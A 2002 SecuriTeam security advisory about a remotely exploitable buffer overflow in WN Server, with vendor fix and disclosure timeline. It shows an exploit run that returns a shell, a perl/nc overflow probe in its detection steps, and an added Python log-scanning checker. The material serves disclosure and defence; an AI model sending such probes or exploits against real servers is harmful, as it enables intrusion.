[UNIX] Buffer Overflow in WN Server

From: support@securiteam.com
To: list@securiteam.com
Date: Tue,  1 Oct 2002 21:45:25 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Buffer Overflow in WN Server
------------------------------------------------------------------------

SUMMARY

Versions 1.18.2 through 2.0.0 of John Franks' WN Server are susceptible to
a remotely exploitable buffer overflow that could allow an attacker to
execute arbitrary code with the privileges of the targeted server process.
The overflow is triggered by sending WN Server an overly long GET request.
Successful exploitation requires customized shell code, because WN Server
filters the characters it accepts in the requested URI.

"WN is a Web server which runs on a wide variety of UNIX platforms and is
freely available at no cost for any use under the terms of the GNU General
Public License." It is included in the latest FreeBSD ports collection as
well.

DETAILS

Vulnerable systems:
 * WN Server version 1.18.2
 * WN Server version 2.0.0

Immune systems:
 * WN Server version 2.4.4

Analysis:
The following is a snapshot of an exploit at work:

$ (./wn_bof 0 3; cat) | nc target 80
Trying ret=0xbfbeb4ec
$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ uname
FreeBSD

Exploitation of a buffer overflow usually results in one of two outcomes:
the targeted process crashes, or arbitrary code executes. Both have serious
repercussions, but in most cases code execution is the more threatening,
since it can serve as a foothold for further escalation to higher-level
privileges on the targeted host.

Detection:
wn-1.18.2 through wn-2.0.0, the range that includes the version shipped in
the current FreeBSD ports collection, is vulnerable. Take the following
steps to determine whether a specific WN installation is susceptible:

1. Ensure that WN is running and open two terminals.
2. In the first terminal execute:
    $ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80
3. In the second terminal, determine the process ID of the child that was
spawned to handle the previous command, and attach GDB to it:
    # ps ax | grep swn
      4223 ?? Ss 0:00.29 ./swn
      4711 ?? S 0:00.01 ./swn
    # gdb ./swn 4711
      GNU gdb 4.18
      Copyright 1998 Free Software Foundation, Inc.
      ...
4. In the second terminal, type 'c' telling GDB to continue.
5. In the first terminal, press enter. If at this point the following
output is returned from GDB, then a vulnerable WN implementation is
running:
    Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? ()
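Two defender-side checks that follow from the version ranges and the detection
procedure above, added here as an example; this is not code from the advisory,
from iDEFENSE or from the WN Server project. version_status() maps a WN version
string onto exactly the ranges the advisory names and refuses to guess about any
other version; analyse_request_line() flags HTTP request lines (from a proxy or
access log, or a captured request) whose request-target is long enough to be an
overflow probe and reports whether the target is dominated by a single repeated
byte, which is what the 0x61616161 fault address in the GDB output reflects. The
1024-byte threshold and the sample request lines are assumptions made for this
example.

```python
"""Version-range and long-request-line checks for the WN Server overflow.

Added example; not part of the advisory, iDEFENSE or WN Server.
"""
import re
from collections import Counter

# Ranges stated in the advisory: 1.18.2 - 2.0.0 vulnerable, 2.4.4 immune.
VULN_LOW, VULN_HIGH, FIXED = (1, 18, 2), (2, 0, 0), (2, 4, 4)


def parse_version(text):
    """Extract a (major, minor, patch) tuple from strings like 'wn-2.0.0'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(part) for part in m.groups())


def version_status(text):
    """Classify a version strictly by what the advisory states."""
    v = parse_version(text)
    if VULN_LOW <= v <= VULN_HIGH:
        return "vulnerable"
    if v >= FIXED:
        return "immune"
    # Versions below 1.18.2 or between 2.0.1 and 2.4.3 are not assessed
    # by the advisory, so do not report them either way.
    return "not covered by advisory"


# Assumed threshold: far below the 1600-byte path used in the detection
# step above, far above any path a real WN site serves.
MAX_TARGET_LEN = 1024

# HTTP/0.9 simple requests with no version token (what the perl one-liner
# in the detection step sends) are accepted as well.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/\d\.\d)?$")


def analyse_request_line(line):
    """Return a dict describing why the line is suspicious, or None if benign."""
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if not m:
        return {"reason": "malformed", "target_len": len(line)}
    target = m.group("target")
    if len(target) <= MAX_TARGET_LEN:
        return None
    # A target made of one repeated byte is the classic overflow-probe shape.
    byte, count = Counter(target).most_common(1)[0]
    return {
        "reason": "oversized-target",
        "target_len": len(target),
        "dominant_byte": byte,
        "dominant_fraction": round(count / len(target), 2),
    }


def scan(lines):
    """Return [(line_number, finding), ...] for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        finding = analyse_request_line(line)
        if finding is not None:
            findings.append((number, finding))
    return findings


# Constructed sample request lines (not captured traffic).
SAMPLE_LINES = [
    "GET /index.html HTTP/1.0",
    "GET /" + "a" * 1600,                             # the detection-step probe
    "POST /cgi-bin/search HTTP/1.1",
    "GET /" + "A" * 700 + "%41" * 300 + " HTTP/1.0",  # partly URL-encoded filler
    "HEAD / HTTP/1.0",
]

if __name__ == "__main__":
    for v in ("wn-1.18.2", "wn-2.0.0", "wn-2.4.4"):
        print(v, "->", version_status(v))
    for number, finding in scan(SAMPLE_LINES):
        print("line %d: %s" % (number, finding))
```

The length check is deliberately applied to the raw request-target rather than
the decoded path, because the server's own URI filtering happens after the
oversized line has already been read into the buffer; a partly URL-encoded
target (sample line 4) is therefore still reported, with a lower dominant-byte
fraction.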

Vendor response:
WN Server 2.4.4 is available at
http://hopf.math.nwu.edu/wn-2.4.4.tar.gz. Users should strongly consider
deploying the latest version.

Disclosure timeline:
8/29/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to vendor John Franks (john@math.northwestern.edu)
9/24/2002 Disclosed to iDEFENSE Clients
9/25/2002 Vendor Response
9/30/2002 Public Disclosure

ADDITIONAL INFORMATION

The information has been provided to iDEFENSE by badc0ded
(badc0ded@badc0ded.com).
